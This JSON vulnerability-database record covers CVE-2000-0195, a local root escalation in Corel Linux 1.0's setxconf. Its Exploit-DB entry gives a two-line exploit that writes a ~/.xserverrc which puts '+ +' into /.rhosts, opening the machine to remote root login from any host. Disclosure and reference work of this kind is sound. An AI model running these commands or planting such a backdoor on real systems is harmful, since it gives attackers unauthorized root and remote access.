{"osvdb": [{"lastseen": "2017-04-28T13:19:56", "bulletinFamily": "software", "cvelist": ["CVE-2000-0195"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[CVE-2000-0195](https://vulners.com/cve/CVE-2000-0195)\nBugtraq ID: 1008\n", "modified": "2000-02-24T00:00:00", "published": "2000-02-24T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1231", "id": "OSVDB:1231", "title": "Linux setxconf -T Option Local Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T12:39:34", "description": "Corel Linux OS 1.0 setxconf Vulnerability. CVE-2000-0195. Local exploit for linux platform", "published": "2000-02-24T00:00:00", "type": "exploitdb", "title": "Corel Linux OS 1.0 setxconf Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0195"], "modified": "2000-02-24T00:00:00", "id": "EDB-ID:19765", "href": "https://www.exploit-db.com/exploits/19765/", "sourceData": "source: http://www.securityfocus.com/bid/1008/info\r\n\r\nA vulnerability exists in the setxconf utility, as shipped with Corel Linux 1.0. The -T option to setxconf will run xinit, which euid root. xinit, when executed, will invoke the contents on ~/.xserverrc. A malicious user could therefore execute commands as root.\r\n\r\ncat > ~/.xserverrc\r\necho \"+ +\" > /.rhosts", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19765/"}]}